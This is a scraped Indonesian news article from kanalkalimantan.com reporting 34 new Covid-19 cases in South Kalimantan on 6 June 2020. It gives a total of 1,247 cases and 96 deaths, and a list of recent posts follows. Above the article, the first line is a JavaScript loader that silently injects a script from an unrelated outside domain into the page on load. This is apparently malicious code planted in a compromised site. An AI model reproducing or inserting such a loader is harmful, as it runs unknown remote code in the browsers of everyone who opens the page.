(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Kalimantan Selatan

34 Kasus Baru Didominasi Hasil Tracing, Kasus Covid-19 di Kalsel Naik Jadi 1.247 Kasus


KANALKALIMANTAN.COM, BANJARBARU – kasus positif Covid-19 di Kalimantan Selatan terus bertambah. Kali ini data dari Tim Gugus Tugas Percepatan Penanganan (P2) Covid-19 Kalsel pada Sabtu (6/6/2020) mencatat, jumlah pasien positif Covid-19 mencapai 1.247 kasus.

Penambahan positif Covid-19 pada Sabtu (6/6/2020) tercatat sebanyak 34 kasus. Di mana, 16 kasus berasal dari pasien dalam pengawasan (PDP) yang terkonfirmasi positif Covid-19.

Sebanyak 16 kasus positif Covid-19 sendiri berasal dari RSUD Ulin Banjarmasin sebanyak sembilan kasus (Kota Banjarmasin delapan kasus, satu kasus dari Provinsi Kalimantan Tengah).

Kemudian, enam kasus dari RSUD Moch Ansari Saleh Banjarmasin (Kota Banjarmasin lima kasus, Kabupaten Baritokuala satu kasus). Serta satu kasus positif lainnya merupakan PDP yang meninggal dunia pada 27 Mei 2020 lalu dan belakangan terkonfirmasi positif Covid-19.

“Selebihnya ada sekitar 18 kasus berdasar hasil tracing,” kata Juru Bicara Tim Gugus Tugas P2 Covid-19 Kalsel Muhamad Muslim, Sabtu (6/6/2020) petang.

Dari jumlah 18 kasus hasil tracing, 10 kasus berasal dari Kota Banjarmasin, 3 kasus dari Kabupaten Banjar, 2 kasus dari Kabupaten Tanahlaut. Sisanya, masing-masing satu kasus dari Kabupaten Kotabaru, Kabupaten Baritokuala dan Kabupaten Hulu Sungai Utara.

Kasus meninggal dunia akibat Covid-19 sendiri juga bertambah sebanyak dua kasus. Selain satu kasus yang telah disebutkan sebelumnya, satu kasus lainnya dilaporkan meninggal dunia pada 4 Juni 2020. Sehingga kini tercatat ada 96 kasus positif Covid-19 yang meninggal dunia.

“Yang meninggal dunia pada 27 Mei 2020 yaitu KS Covid #1230, usia 50 tahun, laki-laki dari Banjarmasin. Kemudian yang meninggal dunia pada 4 Juni 2020 yaitu KS Covid #959, berusia 44 tahun, laki-laki dari Banjarbaru,” beber Kepala Dinas Kesehatan Provinsi Kalsel ini.

Sementara itu, tidak ada kasus positif Covid-19 yang dilaporkan telah sembuh. Sehingga jumlahnya tetap bertengger di angka 104 kasus.

Saat ini, dari 1.247 kasus positif Covid-19, 1.047 kasus di antaranya menjalani perawatan. Di mana, 219 kasus menjalani perawatan di rumah sakit.

“Selebihnya sebanyak 828 kasus dirawat dalam karantina secara khusus maupun isolasi secara mandiri di beberapa tempat. Oleh karena itu, saat ini kasus yang tidak memiliki gejala maupun gejala-gejala yang ringan sebanyak 79,08 persen,” ungkap Muslim. (kanalkalimantan.com/fikri)

 

Reporter : Fikri
Editor : Dhani

 


Desy Arfianty

Recent Posts

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

7 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

9 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

9 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

9 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

10 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

12 jam ago

This website uses cookies.